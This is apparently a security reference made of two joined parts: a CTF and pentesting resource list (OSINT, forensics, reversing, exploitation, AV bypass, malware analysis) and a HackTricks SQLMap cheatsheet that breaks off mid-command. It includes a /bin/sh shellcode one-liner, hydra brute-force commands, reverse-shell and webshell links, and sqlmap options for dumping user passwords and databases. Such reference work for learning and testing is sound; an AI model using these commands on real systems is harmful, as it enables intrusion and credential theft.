https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06 https://ciberpatrulla.com/links/ https://osintframework.com/ * Tools, flowcharts and cheatsheets to help you do your OSINT research: https://technisette.com/p/tools * Recopilation: https://osint.link/ * World domain DB: http://web.archive.org/ && https://archive.eu/ * DNS Search: https://dns.coffee/ * Cyber Defense Search: https://www.onyphe.io/ * Abuse Domain,IP: https://www.abuseipdb.com/ https://dns-lookup.jvns.ca/ https://www.greynoise.io/ https://www.brightcloud.com/tools/url-ip-lookup.php * Reputation url checker: https://www.urlvoid.com/ * The search engine for the Internet of Things: https://www.shodan.io/ && All filters cheatseet: https://beta.shodan.io/search/filters * IVRE: https://ivre.rocks/ * Threat Intel Tools: https://cyberfive.uk/threat-intel-tools/ https://talosintelligence.com/ * PGP Global Directory: https://keyserver2.pgp.com/vkd/GetWelcomeScreen.event * Hurricane Electric BGP: https://bgp.he.net/ * Email2PhoneNumber: https://github.com/martinvigo/email2phonenumber * Honeypot or not: https://honeyscore.shodan.io/ https://builtwith.com/ * Pwn email DB TOR: http://pwndb2am4tzkvold.onion/ * Website to check if emails or passwords have been compromised: https://haveibeenpwned.com/ * Leaks: https://leaks.sh/ * Pwn DB: https://www.dehashed.com/?__cf_chl_jschl_tk__=ab484f797848c365ec48f7297ac4b9ba4587d775-1625827161-0-ARQgSNH3MSi0R4OUxmHmJCgUIz4nZrldFwXK6QZ21tONCEndyB_ypTCETLDm8vhRWeKD6v_ZraA5mbmvd03j1oeQb7QNsx5pg0lMhaNv2l7aw8DKR4a7ENkylr9knbiDx9X3RVn5AcH2uWuG_yRgk28j6x_zyccpXWc8LsTN9VxXZCZb16SEqwbuLdQ-JjWp0eQIgEMAPkLgosrsZyCdRa0A2mqMu8Mz4g-j4z8xR4v-4tqNwcP_TNtCK74-DIWZ80Zth2At6XizE72m_QifLrQH-gFUWPQ7hMzbNr5ONgZbyTZy_0YQA2SqHS5EUj5duq3WhbHdKEsRzXC6ch1EdQ5GagnSc8fH_NAqrI2aebrGF37HEXWkn7ZwxLGDLPAF63tV-77gQ4xhCnCDJp-vpcs * Pwn email DB: https://intelx.io/ * Pwn email DB: https://cybernews.com/personal-data-leak-check/ * PwnDB Script: https://github.com/davidtavarez/pwndb * Search filtered credentials in plain text: https://esgeeks.com/pwndb-buscar-credenciales-filtradas-texto-plano/ * Email checker: https://toolbox.googleapps.com/apps/checkmx/ * General purpose: https://github.com/Moham3dRiahi/Th3inspector * Gooogle Image Search: https://www.google.es/imghp?hl=es , Yandex: https://yandex.com/images/ , Bing: https://www.bing.com/?scope=images&nr=1&FORM=NOFORM * Reverse Image Search: https://tineye.com/ * Tool for tracking the redirection paths of URLs: https://wheregoes.com/ * Phishing Domain DB: http://phishtank.org/ * Phishing Domain DB: https://phishcheck.me/ * Phishing Research: https://safeweb.norton.com/ , https://isitphishing.org/, https://openphish.com/ && https://opentip.kaspersky.com/. * Instagram: https://github.com/th3unkn0n/osi.ig * Censys: https://censys.io/ipv4 * Zoomeye.org: https://www.zoomeye.org/ * IVRE: https://ivre.rocks/ * IOT search engine: https://www.thingful.net/ * Find email addresses related to a domain: https://hunter.io/ * People search engine: https://thatsthem.com/ * Fofa search engine: https://fofa.so/ (Similar to Shodan) * Graphical OSINT platform: https://www.spiderfoot.net/# * Fullhunt: https://fullhunt.io/ * Code search: https://grep.app/ && https://publicwww.com/ * Natlas: https://natlas.io/ * Spur: https://spur.us/ * Public Wi-Fi database: https://www.mylnikov.org/ * HTTP headers of a domain: https://www.webconfs.com/http-header-check.php * Metadata of public's documents: https://github.com/Josue87/MetaFinder * Twitter: https://github.com/twintproject/twint && https://tinfoleak.com/ * https://github.com/Quantika14/osint-suite-tools * Check your OWA (Outlook Web Access): https://checkmyowa.unit221b.com/ * Whatspp IP Leak: https://github.com/bhdresh/Whatsapp-IP-leak?s=09 * Book: https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf ### Threat Hunting Analysis I: https://centralops.net/co/ Analaysis II: https://viewdns.info/ Analysis III: https://sitereport.netcraft.com/ Analysis IV: https://www.ipaddress.com/ Malware: https://www.virustotal.com/gui/home/upload & https://opentip.kaspersky.com/ Reputation: https://talosintelligence.com/, https://www.abuseipdb.com/ Technology of a domain: https://builtwith.com/ Tool for tracking the redirection paths of URLs: https://wheregoes.com/ History of a Domain: https://web.archive.org/ Real-time blackhole list,ASNs: https://bgp.he.net/ SSL certificates: https://www.digicert.com/help/ Redirects: https://lookyloo.circl.lu/ Phishing Domain DB: http://phishtank.org/ Phishing Domain DB: https://phishcheck.me/ Phishing Research: https://safeweb.norton.com/ , https://isitphishing.org/, https://openphish.com/ && https://opentip.kaspersky.com/. Recopilation: https://osintframework.com/ Email account analysis: curl emailrep.io/[email protected] ## Forensics * Online PCAP Analysis: https://packettotal.com/ * Tool to identify strings from a pcap: https://github.com/bee-san/pyWhat. Ex:python3 -m pywhat redteam_test03-10423dd9015c050a40b7ccf2a53f57a9.pcapng > output * Wireshark. Cheat sheet: https://cdn.comparitech.com/wp-content/uploads/2019/06/Wireshark-Cheat-Sheet-1.jpg * Volatility. Cheat sheet: https://blog.onfvp.com/post/volatility-cheatsheet/ >>> Malfind,yarascan, Connscan y netscan * Foremost * Binwalk * Autopsy * PhotoRec: https://www.cgsecurity.org/wiki/PhotoRec * Photo forensics: https://29a.ch/photo-forensics/#forensic-magnifier * Recuva: https://www.ccleaner.com/recuva * Keys: https://www.nirsoft.net/utils/product_cd_key_viewer.html * DDRescue. https://launchpad.net/ddrescue-gui * Rescuezilla: https://rescuezilla.com/ * PolarProxy: https://www.netresec.com/?page=PolarProxy * MRC: https://www.magnetforensics.com/resources/magnet-ram-capture/ * Media acquisition (disk to image): https://guymager.sourceforge.io/ * Rapidly Search and Hunt through Windows Event Logs: https://github.com/countercept/chainsaw * AccessData FTK Imager * EnCase * EaseUS Data Recovery Wizard * Testdisk: https://www.cgsecurity.org/wiki/TestDisk_Download * MFT_Browser: https://github.com/kacos2000/MFT_Browser * Powershell Decoder: https://github.com/R3MRUM/PSDecode, https://github.com/JohnLaTwC/PyPowerShellXray and analysis info: https://darungrim.com/research/2019-10-01-analyzing-powershell-threats-using-powershell-debugging.html * PDF analyzer: https://github.com/zbetcheckin/PDF_analysis, https://github.com/DidierStevens/DidierStevensSuite/blob/master/pdfid.py, https://github.com/DidierStevens/DidierStevensSuite/blob/master/pdf-parser.py y https://eternal-todo.com/tools/peepdf-pdf-analysis-tool. * Office analyzer: https://github.com/DissectMalware/XLMMacroDeobfuscator, https://github.com/unixfreak0037/officeparser, https://github.com/decalage2/oletools, https://github.com/bontchev/pcodedmp, https://github.com/decalage2/ViperMonkey && https://blog.didierstevens.com/programs/oledump-py/. * Extract Unicode-encoded content from a file: https://github.com/DidierStevens/DidierStevensSuite/blob/master/base64dump.py * DTMF telephone frecuency: https://unframework.github.io/dtmf-detect/ * To decrypt WPA keys: pyrit -r "capctura.pcap" analyze * Diskeditor: https://www.disk-editor.org/index.html * Passware encryption analyzer: https://www.passware.com/encryption-analyzer/ * Windows Registry Recovery: https://www.softpedia.com/get/Tweak/Registry-Tweak/Windows-Registry-Recovery.shtml * xxd command * Blue Team Cheat sheet: https://itblogr.com/wp-content/uploads/2020/04/The-Concise-Blue-Team-cheat-Sheets.pdf * DFIR cheat sheet: https://www.jaiminton.com/cheatsheet/DFIR/# * Parse a user agent: https://developers.whatismybrowser.com/useragents/parse/ * Grep cheat sheet: https://javiermartinalonso.github.io/linux/2018/01/15/linux-grep-patrones-debug.html * Blog: https://www.osintme.com/ * Regular expressions for grep -Po " " https://www.autoregex.xyz/ && https://regex101.com/ . Cheat sheet: https://cheatography.com/davechild/cheat-sheets/regular-expressions/ * DFIR Cheatsheet: https://dfircheatsheet.github.io/ https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/ https://blog.didierstevens.com/programs/xorsearch/ Forensics RECOPILATION: https://start.me/p/JDRmPO/recursos-forenses && https://start.me/p/q6mw4Q/forensics ## Reversing * Binwalk * Dotpeek (.NET) * Angr(deobfuscated code): https://angr.io/ && https://napongizero.github.io/blog/Defeating-Code-Obfuscation-with-Angr * GameBoy debugger: https://bgb.bircd.org/ * IDA pro. Cheat Sheet: https://www.dragonjar.org/cheat-sheet-ida-pro-interactive-disassembler.xhtml * Ollydbg. Cheat Sheet: http://www.ollydbg.de/quickst.htm * GDB: https://gist.github.com/rkubik/b96c23bd8ed58333de37f2b8cd052c30 * Radare2. Cheat Sheet: https://gist.github.com/williballenthin/6857590dab3e2a6559d7 * Ghidra. Cheat Sheet: https://hackersfun.com/wp-content/uploads/2019/03/Ghidra-Cheat-Sheet.pdf * Immunity Debugger: https://www.immunityinc.com/products/debugger/ * x64dbg * DnSpy https://github.com/dnSpy/dnSpy * Binary Ninja: https://binary.ninja/ * Beginner reversing tool: https://exeinfo-pe.en.uptodown.com/windows * Regshot: https://sourceforge.net/projects/regshot/ (before and after running a binary) * CFF explorer: https://download.cnet.com/CFF-Explorer/3000-2383_4-10431156.html * Online Disassembler: https://onlinedisassembler.com/static/home/index.html * Online Decompiler Explorer: https://dogbolt.org/ * Online Compiler Explorer: https://godbolt.org/ * Online .JAR and .Class to Java decompiler: http://www.javadecompilers.com/ * Hex editor, disk editor, and memory editor: https://mh-nexus.de/en/downloads.php?product=HxD20 * Android Decompiler: https://ibotpeaches.github.io/Apktool/ * Decompile Android files: https://github.com/skylot/jadx * Hopper disassembler: https://www.hopperapp.com/ * List Dynamic Dependencies: Ldd file * Unpacking some binaries: Upx -d file * Identifying packers: https://github.com/horsicq/Detect-It-Easy * Theory: https://0xinfection.github.io/reversing/ * Intel® 64 and IA-32 Architectures Software Developer’s Manual: https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf * Tips: https://blog.whtaguy.com/2020/04/guys-30-reverse-engineering-tips-tricks.html ## Exploiting * Ej1: python -c "print 'A'*150" >>> Then ./binario 150 A python -c "print ('A' * 5100)" * Ej2: (echo -e "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; cat-) | ./binario (Shellcode for x86 32 linux) ## Pentesting Common ports cheatsheet: https://packetlife.net/media/library/23/common_ports.pdf Enumeration cheatsheet: https://pentestwiki.org/enumeration-cheat-sheet/ ### Recon * Nmap. Cheatsheet: https://highon.coffee/blog/nmap-cheat-sheet/ && https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20NMap%20Quick%20Reference%20Guide.pdf * S.O recon: "version of a service https://launchpad.net/" * https://sitereport.netcraft.com/ * GUI-DNSRecon: https://www.kitploit.com/2023/02/dnsrecon-gui-dnsrecon-tool-with-gui-for.html * enum4linux - https://highon.coffee/blog/enum4linux-cheat-sheet/ Dig: https://cheatography.com/tme520/cheat-sheets/dig/ wget -nd -r -P /save/location -A jpeg,jpg,bmp,gif,png http://www.somedomain.com Recursive file download bypassing robots.txt: wget -e robots=off -drc -l5 domain * Scanning with third parties: https://hackertarget.com/nmap-online-port-scanner/, https://www.ipfingerprints.com/, https://spiderip.com/online-port-scan.php, https://portscanner.standingtech.com/ && https://www.yougetsignal.com/tools/open-ports/ * Scanless project: https://github.com/vesche/scanless * List emails from a domain: https://maildump.co/domain-search * List domains of a company: Curl https://sonar.omnisint.io/tlds/<company name> * SPF,DKIM,DMARC: https://www.kitploit.com/2023/02/email-vulnerablity-checker-find-email.html & https://github.com/magichk/magicspoofing && https://toolbox.googleapps.com/apps/checkmx/ * Company hashes & passwords: https://www.dehashed.com/ * dnsrecon -d dte.local -n IP - https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/ * Biggest DNS historical data: https://securitytrails.com/ * DNS Host Records: https://hackertarget.com/find-dns-host-records/ * HTTP Header Analysis Vulnerability Tool: https://dnsdumpster.com/ * ReconFTW: https://github.com/six2dez/reconftw * Autorecon: https://github.com/Tib3rius/AutoRecon * OSINT gathering tool: https://github.com/s0md3v/Photon * OSINT gathering tool: https://github.com/laramies/theHarvester * DNS resolver: https://github.com/d3mondev/puredns * Sublist3r: https://github.com/aboul3la/Sublist3r * Ffuf: https://github.com/ffuf/ffuf * Nuclei: https://github.com/projectdiscovery/nuclei * Expired domains: https://www.expireddomains.net/ ### Web * Wappalyzer * whatweb -v -a 3 scanme.nmap.org * nmap -p 80 --script=http-* <IP> * HTTP Header Analysis Vulnerability Tool: https://github.com/Aetsu/gethead/blob/gh-pages/gethead.py * Feroxbuster * Gobuster. Cheat Sheet: https://redteamtutorials.com/2018/11/19/gobuster-cheatsheet/ * Burpsuite * OWASP ZAP, OpenVas, Sparta & Nikto. Cheat Sheet: https://cdn.comparitech.com/wp-content/uploads/2019/07/NIkto-Cheat-Sheet.webp * Hydra. Cheat Sheet: hydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form “__csrf_magic=sid%3Ae40fd9611063464c3ff346ffa53b7a28b3cd5971%2C1638348501&usernamefld=admin&passwordfld=^PASS^&login=Sign+In" || patator http_fuzz url=http://IP/ method=POST &usernamefld=admin&passwordfld=FILE0&login=Sign+In' 0=/usr/share/wordlists/rockyou.txt follow=1 accept_cookie=1 -x ignore:fgrep='Username or Password incorrect' * hydra -s 22 -l user -P /usr/share/wordlists/rockyou.txt IP -t 4 ssh * wfuzz. Cheat Sheet: https://book.hacktricks.xyz/pentesting-web/web-tool-wfuzz * 2FA Bypass: https://www.xmind.net/m/8Hkymg/ * Dirbuster. https://mundo-hackers.weebly.com/dirbuster.html * Linkfinder: https://github.com/GerbenJavado/LinkFinder * Dirsearch: https://github.com/maurosoria/dirsearch * Automated All-in-One OS command injection and exploitation tool: https://github.com/commixproject/commix * Automated XSS tool: https://xsser.03c8.net/ * Automated XSS tool: https://github.com/ssl/ezXSS * RECOX: https://github.com/samhaxr/recox/blob/master/recox.sh * SQL payload examples: https://github.com/payloadbox/sql-injection-payload-list * Command injection: https://github.com/payloadbox/command-injection-payload-list * XSS in 2021: https://netsec.expert/posts/xss-in-2021/ * SSRF Cheatsheet: https://highon.coffee/blog/ssrf-cheat-sheet/#curl-ssrf-wrappers--url-schema * WPscan * XSS firefox extension searcher: https://addons.mozilla.org/es/firefox/addon/knoxss-community-edition/ * Inspect HTTP headers: https://requestbin.net/ && https://webhook.site/#!/75039a57-2015-4f74-9612-b762f4353b9b && https://securityheaders.com/?q=aguasdelsorbe.es&followRedirects=on https://pentest-tools.com/home https://book.hacktricks.xyz/ http://jsonviewer.stack.hu/ https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE https://jorgectf.gitbook.io/awae-oswe-preparation-resources/ * Web Tips: https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf ### Exploit Database * CVE Search: https://github.com/Anonimo501/cve_search * https://www.exploit-db.com/ * SearchSploit. Cheat sheet: https://blog.ehcgroup.io/2018/11/27/01/00/39/4198/como-usar-searchsploit-para-encontrar-exploits/hacking/ehacking/ * https://cvexploits.io/ ### Credentials * Default credentials: https://github.com/ihebski/DefaultCreds-cheat-sheet/blob/main/DefaultCreds-Cheat-Sheet.csv ### Exploitation * Online reverse shell generator: https://www.revshells.com/ * Reverse shell cheatsheet: https://reconshell.com/reverse-shell-cheat-sheet/ && Cheatsheet: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md * Webshells: https://github.com/BlackArch/webshells * Popshells: https://github.com/0x00-0x00/ShellPop * Upgrading Simple Shells to Fully Interactive TTYs: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ * crackmapexec - https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/ * Rundll32 commands examples: https://www.jesusninoc.com/04/12/rundll32-commands-for-windows/ * rdesktop IP, proxychains <rdesktop> IP * sqlmap - https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet * Reverse shell payload generator - Hoaxshell: https://github.com/t3l3machus/hoaxshell * Running commands on an Microsoft Exchange: https://github.com/WithSecureLabs/peas * Powerglot: https://github.com/mindcrypt/powerglot ### Active Directory * Network Scanner: https://www.softperfect.com/products/networkscanner/ * linWinPwn: https://github.com/lefayjey/linWinPwn * Mimikatz: https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz * Crackmapexec: https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/ * LDAP enumeration: https://pentestwiki.org/enumeration-cheat-sheet/#h-ldap-enumeration * Bloodhound: https://bloodhound.readthedocs.io/en/latest/index.html * Adalanche: https://www.kitploit.com/2021/08/adalanche-active-directory-acl.html ### Privilege Escalation #### Windows sudo apt install peass * WinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS * Juicy potato: https://github.com/ohpe/juicy-potato * PowerUp: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1 #### Linux * LinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS * LinEnum: https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh * BeRoot: https://github.com/AlessandroZ/BeRoot/tree/master/Linux ### Legit binaries in a system * Lolbas from Windows: https://lolbas-project.github.io/ * GTFOBins from Unix Systems: https://gtfobins.github.io/ ### AV bypass * Bypass Windows defender with binaries: https://github.com/Bl4ckM1rror/FUD-UUID-Shellcode * Shikata ga nai: https://github.com/EgeBalci/sgn * AV'S evasion: https://github.com/Veil-Framework/Veil-Evasion * Shellter: https://www.kali.org/tools/shellter/ ### Automatic Frameworks * Metasploit. Cheatsheet: https://github.com/k1000o23/cheat_sheets/blob/master/metasploit_cheat_sheet.pdf * Kaboom: https://github.com/Leviathan36/kaboom * Fsociety framework: https://github.com/Manisso/fsociety * Empire. Cheatsheet: https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf ### Mobile * Mobile Pentest Cheatsheet: https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet && https://github.com/randorisec/MobileHackingCheatSheet * Automated Mobile tools: https://github.com/MobSF/Mobile-Security-Framework-MobSF, https://github.com/SUPERAndroidAnalyzer/super * List of Vulnerable Android Applications: https://github.com/netbiosX/Pentest-Bookmarks/blob/master/Training-Labs/Mobile-Testing/Android-Applications.mdown * PcapDroid: https://play.google.com/store/apps/details?id=com.emanuelef.remote_capture&hl=es_419&gl=US ### Wifi * Fing application: https://www.fing.com/ * Wifi analyzer: https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&hl=es&gl=US&pli=1 * Auditing Wifi: https://github.com/v1s1t0r1sh3r3/airgeddon * https://en.kali.tools/?p=244 * Wifi Crack: https://github.com/s4vitar/wifiCrack * Fern: https://github.com/savio-code/fern-wifi-cracker * EvilTrust: https://github.com/s4vitar/evilTrust * RomBuster: https://github.com/EntySec/RomBuster Yersinia Bettercap Wifi Pineapple https://linuxhint.com/how_to_aircrack_ng/ * PCAP capture crack: https://www.onlinehashcrack.com/ ### Utility * mount -t cifs IP/SharedResource /mnt/smbmounted -o vers=2.1 && * smbclient -U "" -N //IP/SharedResource * dpkg -l to list all the installed programs in a virtual machine. Pipe the output in order to search what you want. * Msfvenom: https://www.offensive-security.com/metasploit-unleashed/msfvenom/ & https://www.offensive-security.com/metasploit-unleashed/binary-payloads/ * Nishang: https://github.com/samratashok/nishang * Are u block?: https://ippsec.rocks/?# * OSCP-style: https://gist.github.com/s4vitar/b88fefd5d9fbbdcc5f30729f7e06826e * Pentest-book: https://pentestbook.six2dez.com/ && https://book.hacktricks.xyz/pentesting-methodology * Videos: https://www.youtube.com/c/S4viOnLive ## Malware ### Online engines * https://www.filescan.io/ * Virustotal: https://www.virustotal.com/gui/home/search * Online Cuckoo Sandbox: https://sandbox.pikker.ee/ * APK's: https://mobsf.live/ && https://koodous.com/ * Joesandbox: https://www.joesandbox.com/#windows * Kaspersky: https://opentip.kaspersky.com/ * Intezer: https://analyze.intezer.com/scan * Hybrid Analysis: https://www.hybrid-analysis.com/?lang=es * Database of counterfeit-related webs: https://desenmascara.me/ * ANY.RUN https://any.run/ https://antiscan.me/ https://www.virscan.org/ * Polyswarm: https://polyswarm.network https://metadefender.opswat.com/?lang=en ### Distros to analyze malware * Linux Distro to investigate malware: https://docs.remnux.org/ * Windows Distro to investigate malware: https://github.com/mandiant/flare-vm * https://github.com/LaurieWired/linux_malware_analysis_container ### Tools * Sysinternals: https://docs.microsoft.com/en-us/sysinternals/ * Capa: https://github.com/mandiant/capa * Detect it easy(packer detector): https://en.kali.tools/?p=1644 * Sysinspector: https://support.eset.com/es/que-es-eset-sysinspector * Dependency walker from an executable file: https://www.dependencywalker.com/ * Autoruns: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns * RAM capturer: https://belkasoft.com/ram-capturer * Recopilation: https://github.com/rshipp/awesome-malware-analysis * Reverse Engineer's Toolkit: https://github.com/mentebinaria/retoolkit * PEstudio: https://www.winitor.com/ * Malzilla: https://malzilla.org/ * PROCMON+PCAP: https://www.procdot.com/ * Analyze APK's: https://github.com/quark-engine/quark-engine && https://github.com/mvt-project/mvt && https://github.com/pjlantz/droidbox * XORSearch: https://blog.didierstevens.com/programs/xorsearch/ * RAT Decoder: https://github.com/kevthehermit/RATDecoders * Malwoverview: https://github.com/alexandreborges/malwoverview * Binary strings defuser: https://github.com/fireeye/flare-floss * Network analysis of malware (emulate HTTP server): https://github.com/felixweyne/imaginaryC2 * This tool allows you to intercept and redirect all or specific network traffic while simulating legitimate network services: https://github.com/mandiant/flare-fakenet-ng ### Free AVs and Sandboxes * ClamAV: https://www.clamav.net/downloads#otherversions * MAC AV: https://www.pcrisk.es/mejores-programas-antivirus/8365-combo-cleaner-antivirus-and-system-optimizer-mac * Sandbox: https://github.com/CERT-Polska/drakvuf-sandbox * DragonFly: https://dragonfly.certego.net/register * Offline Sandbox: https://sandboxie-plus.com/downloads/ ### Ransomware * Ransomware decryption tools: http://files-download.avg.com/util/avgrem/avg_decryptor_Legion.exe, https://success.trendmicro.com/solution/1114221-downloading-and-using-the-trend-micro-ransomware-file-decryptor, https://www.nomoreransom.org/es/decryption-tools.htmlm, https://www.avast.com/es-es/ransomware-decryption-tools , https://noransom.kaspersky.com/ , https://www.mcafee.com/enterprise/es-es/downloads/free-tools/ransomware-decryption.html, https://www.mcafee.com/enterprise/en-us/downloads/free-tools.html, https://www.emsisoft.com/ransomware-decryption-tools/, https://decoded.avast.io/threatresearch/decrypted-bianlian-ransomware/. * General Overview: https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml# * Ransomware groups: http://edteebo2w2bvwewbjb5wgwxksuwqutbg3lk34ln7jpf3obhy4cvkbuqd.onion/ ### APTs * Intelligence: https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/pubhtml# && https://github.com/StrangerealIntel/EternalLiberty/blob/main/EternalLiberty.csv && https://xorl.wordpress.com/ Are you an APT target? -> https://lab52.io/ * APT Simulator: https://github.com/NextronSystems/APTSimulator ### Blogs and Information * Macros: https://blog.didierstevens.com/2021/01/19/video-maldoc-analysis-with-cyberchef/ && https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ * Malware examples/binaries: https://bazaar.abuse.ch/, https://github.com/ytisf/theZoo & https://malshare.com/ ## Utility * To bypass some filtered ports: nmap -sSV ... * zip2john backup.zip secret.hash * john --show secret.hash * Hexeditor * nc -nlvp URL port * Grep * rgrep (Recursive grep) * awk * perl * tail / head * curl -Llv domain | curl -b "protected=d41d8cd98f00b204e9800998ecf8427e"(cookie) "domain" * Identify -verbose * Hash-identifier * cat 'file' | md5sum, sha1sum,sha256sum... * echo "string" | base64 -d * Strings * File * Cewl. Cheat sheet: https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-5-creating-custom-wordlist-with-cewl-0158855/ * Password Recovery Online : https://www.lostmypass.com/try/ * Passwords stored in a computer: https://github.com/AlessandroZ/LaZagne * Disk Image: https://www.datanumen.com/disk-image-download-thanks/ * crackzip: https://github.com/Xpykerz/CrackZip * zip2john: https://github.com/openwall/john/blob/bleeding-jumbo/src/zip2john.c * Common User Passwords Profiler: https://github.com/Mebus/cupp y https://github.com/r3nt0n/bopscrk. * Dig: https://cheatography.com/tme520/cheat-sheets/dig/ * wget -nd -r -P /save/location -A jpeg,jpg,bmp,gif,png http://www.somedomain.com * Recursive file download bypassing robots.txt: wget -e robots=off -drc -l5 domain * [ICMP exfiltration] tshark -r 1pcap_test_1c.pcapng -Y "icmp" -Tjson | grep data.data | awk {'print $2'} | cut -c 2-3 | uniq | xxd -r -p * Oneliners: https://linuxcommandlibrary.com/basic/oneliners.html * Google information: ![image](https://user-images.githubusercontent.com/74070814/147261470-9a738efb-69de-4b89-98aa-be27a9f83d78.png) ## Wikis https://github.com/JohnHammond/ctf-katana https://github.com/OpenToAllCTF/Tips Reversing tutorial: https://github.com/mytechnotalent/Reverse-Engineering-Tutorial ## Write-Ups https://ctftime.org/writeups https://apsdehal.in/awesome-ctf/ https://jorgectf.gitlab.io/ https://github.com/0e85dc6eaf/CTF-Writeups https://github.com/RazviOverflow/ctfs https://github.com/DEKRA-CTF/CTFs/tree/main/2020 https://medium.com/bugbountywriteup/tryhackme-reversing-elf-writeup-6fd006704148 https://github.com/W3rni0/ctf_writeups_archive/tree/master/castorsCTF_2020 ## Other tools https://github.com/zardus/ctf-tools https://github.com/apsdehal/awesome-ctf
# SQLMap - Cheetsheat <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). </details> <figure><img src="../../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure> [**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\ ¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!: {% embed url="https://www.dragonjarcon.org/" %} ## Basic arguments for SQLmap ### Generic ```bash -u "<URL>" -p "<PARAM TO TEST>" --user-agent=SQLMAP --random-agent --threads=10 --risk=3 #MAX --level=5 #MAX --dbms="<KNOWN DB TECH>" --os="<OS>" --technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ") --batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI) --auth-cred="<AUTH>" #HTTP authentication credentials (name:password) --proxy=http://127.0.0.1:8080 --union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char ``` ### Retrieve Information #### Internal ```bash --current-user #Get current user --is-dba #Check if current user is Admin --hostname #Get hostname --users #Get usernames od DB --passwords #Get passwords of users in DB --privileges #Get privileges ``` #### DB data ```bash --all #Retrieve everything --dump #Dump DBMS database table entries --dbs #Names of the available databases --tables #Tables of a database ( -D <DB NAME> ) --columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> ) -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column ``` ## Injection place ### From Burp/ZAP capture Capture the request and create a req.txt file ```bash sqlmap -r req.txt --current-user ``` ### GET Request Injection ```bash sqlmap -u "http://example.com/?id=1" -p id sqlmap -u "http://example.com/?id=*" -p id ``` ### POST Request Injection ```bash sqlmap -u "http://example.com" --data "username=*&password=*" ``` ### Injections in Headers and other HTTP Methods ```bash #Inside cookie sqlmap -u "http://example.com" --cookie "mycookies=*" #Inside some header sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*" sqlmap -u "http://example.com" --headers="referer:*" #PUT Method sqlmap --method=PUT -u "http://example.com" --headers="referer:*" #The injection is located at the '*' ``` ### Indicate string when injection is successful ```bash --string="string_showed_when_TRUE" ``` ### Eval **Sqlmap** allows the use of `-e` or `--eval` to process each payload before sending it with some python oneliner. This makes very easy and fast to process in custom ways the payload before sending it. In the following example the **flask cookie session** **is signed by flask with the known secret before sending it**: ```bash sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = 